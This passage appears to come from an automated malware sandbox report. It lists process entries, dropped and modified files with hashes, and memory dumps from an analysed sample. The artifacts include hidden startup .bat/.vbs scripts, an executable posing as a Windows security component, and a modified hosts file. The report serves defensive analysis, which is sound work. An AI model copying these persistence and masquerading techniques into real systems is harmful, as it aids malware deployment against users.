                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:4348
                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                        1⤵
                                                                                                                          PID:4336
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                          1⤵
                                                                                                                            PID:3796
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:5112

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                              Filesize

                                                                                                                              328B

                                                                                                                              MD5

                                                                                                                              da1065b4268064cc81aa32eaecfa390d

                                                                                                                              SHA1

                                                                                                                              97b93a7ca18a7668a0f8ccc0f766b87414a87eba

                                                                                                                              SHA256

                                                                                                                              415af29f25ae73336ba8cc160c414679cc54e5907404ebb28b800c36732c5d86

                                                                                                                              SHA512

                                                                                                                              ec79a3f3a037caa8551cd3165a6e4ca372ef2843ed7dc272de08757d703475c92cb1b60a2be6d91aca1c611d6b62a2533952c4cced03ba25fb69219e8a42454d

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                              Filesize

                                                                                                                              3KB

                                                                                                                              MD5

                                                                                                                              661739d384d9dfd807a089721202900b

                                                                                                                              SHA1

                                                                                                                              5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                                              SHA256

                                                                                                                              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                                              SHA512

                                                                                                                              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                                              SHA1

                                                                                                                              0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                                              SHA256

                                                                                                                              342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                                              SHA512

                                                                                                                              f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              12c844ed8342738dacc6eb0072c43257

                                                                                                                              SHA1

                                                                                                                              b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

                                                                                                                              SHA256

                                                                                                                              2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

                                                                                                                              SHA512

                                                                                                                              e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                                                              SHA1

                                                                                                                              c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                                                              SHA256

                                                                                                                              2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                                                              SHA512

                                                                                                                              60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              944B

                                                                                                                              MD5

                                                                                                                              15dde0683cd1ca19785d7262f554ba93

                                                                                                                              SHA1

                                                                                                                              d039c577e438546d10ac64837b05da480d06bf69

                                                                                                                              SHA256

                                                                                                                              d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                                                              SHA512

                                                                                                                              57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0jtqo3d4\0jtqo3d4.dll

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                              MD5

                                                                                                                              d0d84f2df4324ad68ef2953497075155

                                                                                                                              SHA1

                                                                                                                              154ac6f535763bcc1dab5d712caef26c1f076d4f

                                                                                                                              SHA256

                                                                                                                              f374f89dc1a0f8feed9ce7c9fa5e3f009496e2fe4ed3890101349d2c3f3acd5f

                                                                                                                              SHA512

                                                                                                                              94a9dee799332d2b86ecee1a01e6856dac7c5ec94da24ce953ca886b985dd2e6d1dab918e3c89b35d03ef7607d36fe417fbb34f9d56ed7ca7db01c1f88035e85

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9FClz2U4d7\Display (1).png

                                                                                                                              Filesize

                                                                                                                              423KB

                                                                                                                              MD5

                                                                                                                              0eba9608ddd7546eba1aa23108254ae6

                                                                                                                              SHA1

                                                                                                                              096fab7e34dba2b1e547a53db67f58cb3c825309

                                                                                                                              SHA256

                                                                                                                              e1f08c76e419060cce3767265192a2288aef6bb4a8a84ec34d8851613264f61d

                                                                                                                              SHA512

                                                                                                                              c9ec0d23602b3461672e59c16920111dfefc3e83cbfdef8142359705f8c71790724d38dee62602111190709ab3f9748fa249e1d6d413bad0ef66cd5d2600d8c2

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RESB2C5.tmp

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              9ecaa36508f9cfd30346e347f2aa2422

                                                                                                                              SHA1

                                                                                                                              eab7c3aec773e6cd96b060d33c31c221c0c10920

                                                                                                                              SHA256

                                                                                                                              57176fd0742f8d82e9f0cd7ebff7d95ef4534dd8d0048163bec49ef60a39a999

                                                                                                                              SHA512

                                                                                                                              adb77088b461d62f196ee3412a4c55ee25d521576c877fbf4ebc35ade1d095ed73565b7d9956e947972b129d4b6c454f22127686f8823702c79e4e17c6043ed3

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qecuq2bk.mpt.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_226.bat

                                                                                                                              Filesize

                                                                                                                              13.0MB

                                                                                                                              MD5

                                                                                                                              441100cf63c807c0d4f359c64499ffa6

                                                                                                                              SHA1

                                                                                                                              f65d189e9d35cef146f7e04b603032123f931691

                                                                                                                              SHA256

                                                                                                                              70fdc6e91d6f0b7a3e72638bda9333eabb83a949e38216d52952629f98b1317c

                                                                                                                              SHA512

                                                                                                                              de0352fad3f2df48638036052a29173328ca1a3ab119b2707ae982833914685f7088b9d4cbcbe2eb7f2a8270c76e3731c1d854568112c0c8d41b89b54c7b2d43

                                                                                                                            • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_226.vbs

                                                                                                                              Filesize

                                                                                                                              124B

                                                                                                                              MD5

                                                                                                                              3c2e8914bca622b7aa55d95b54fd3714

                                                                                                                              SHA1

                                                                                                                              6ef6a7898708db1c5388a0a33263c301f6875852

                                                                                                                              SHA256

                                                                                                                              9757d0ad1f96a5a1e82a6a6eb925c1b550ef9ae8089f39463f9fc68205fb973f

                                                                                                                              SHA512

                                                                                                                              4c3385f62a25ea24552993897cfcb791c620856cca3458f1c9b2946255aa604fcf9b26c906a34087e5e546cfd01df19025635554fd175d8d992e0daa85762318

                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                                                                                                              Filesize

                                                                                                                              442KB

                                                                                                                              MD5

                                                                                                                              04029e121a0cfa5991749937dd22a1d9

                                                                                                                              SHA1

                                                                                                                              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                              SHA256

                                                                                                                              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                              SHA512

                                                                                                                              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                              SHA1

                                                                                                                              98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                              SHA256

                                                                                                                              ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                              SHA512

                                                                                                                              c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              f313c5b4f95605026428425586317353

                                                                                                                              SHA1

                                                                                                                              06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                              SHA256

                                                                                                                              129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                              SHA512

                                                                                                                              b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                              SHA1

                                                                                                                              a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                              SHA256

                                                                                                                              98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                              SHA512

                                                                                                                              1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                              SHA1

                                                                                                                              63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                              SHA256

                                                                                                                              727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                              SHA512

                                                                                                                              f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                              SHA1

                                                                                                                              5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                              SHA256

                                                                                                                              55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                              SHA512

                                                                                                                              5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              0b990e24f1e839462c0ac35fef1d119e

                                                                                                                              SHA1

                                                                                                                              9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                              SHA256

                                                                                                                              a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                              SHA512

                                                                                                                              c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                            • C:\Windows\system32\drivers\etc\hosts

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              6e2386469072b80f18d5722d07afdc0b

                                                                                                                              SHA1

                                                                                                                              032d13e364833d7276fcab8a5b2759e79182880f

                                                                                                                              SHA256

                                                                                                                              ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                                                                                              SHA512

                                                                                                                              e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\0jtqo3d4\0jtqo3d4.0.cs

                                                                                                                              Filesize

                                                                                                                              1004B

                                                                                                                              MD5

                                                                                                                              c76055a0388b713a1eabe16130684dc3

                                                                                                                              SHA1

                                                                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                              SHA256

                                                                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                              SHA512

                                                                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\0jtqo3d4\0jtqo3d4.cmdline

                                                                                                                              Filesize

                                                                                                                              607B

                                                                                                                              MD5

                                                                                                                              5c26530b973218f2db18a85ffb2635cd

                                                                                                                              SHA1

                                                                                                                              48c84002eb11b184d0e350fb5a3ae26a16747b2a

                                                                                                                              SHA256

                                                                                                                              25deb671c5b681cb92dab716353bcff481047d56bfb34b44241cc1e4872b548d

                                                                                                                              SHA512

                                                                                                                              cdbd9aa7630ea863c03f049f179ddfd458cc0b9adacbfbaf5bb61537fa548856203dce1939f11b604976b0e1a5e240685e4b3920dec2ba6d6fc95896b39763d4

                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\0jtqo3d4\CSC688E2F43AC784A1891CECF9D3511AD41.TMP

                                                                                                                              Filesize

                                                                                                                              652B

                                                                                                                              MD5

                                                                                                                              4cde1348071a9dc3e4c58ad7b6318982

                                                                                                                              SHA1

                                                                                                                              5cfb9ad4a5e3b866a59ad5c9950999afa5364b1f

                                                                                                                              SHA256

                                                                                                                              7c7dab65dcfa2aa586e671748c805f95be2fb2c197360ac9e6e5b496f31986ce

                                                                                                                              SHA512

                                                                                                                              ae10d11f8ea09d28d9c5b109001407b86e8be79d6bc0d5e2c4226415457ba910c621e96a675449b8b8cc5db01cd4335a0e7c896628a357717ee7b6b696511be3

                                                                                                                            • memory/912-108-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/964-105-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1572-106-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1688-101-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1704-100-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1764-114-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1912-102-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1920-111-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/2008-110-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/2332-29-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2332-32-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2332-18-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2332-28-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2436-107-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/2676-109-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/2784-0-0x00007FFC3C413000-0x00007FFC3C415000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/2784-15-0x0000023BD1770000-0x0000023BD1778000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/2784-1-0x0000023BD18F0000-0x0000023BD1912000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/2784-11-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2784-50-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2784-12-0x00007FFC3C410000-0x00007FFC3CED1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2784-13-0x0000023BE9BA0000-0x0000023BE9BE4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              272KB

                                                                                                                            • memory/2784-14-0x0000023BEC070000-0x0000023BEC0E6000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              472KB

                                                                                                                            • memory/2784-16-0x0000023BF40F0000-0x0000023BF4AAC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.7MB

                                                                                                                            • memory/3272-104-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/3468-51-0x0000000003420000-0x000000000344A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              168KB

                                                                                                                            • memory/3468-58-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/3748-212-0x00000177FB7F0000-0x00000177FB7F8000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4336-112-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/5004-103-0x0000017A687E0000-0x0000017A697E0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              16.0MB

                                                                                                                            • memory/5112-113-0x00007FFC1B3B0000-0x00007FFC1B3C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB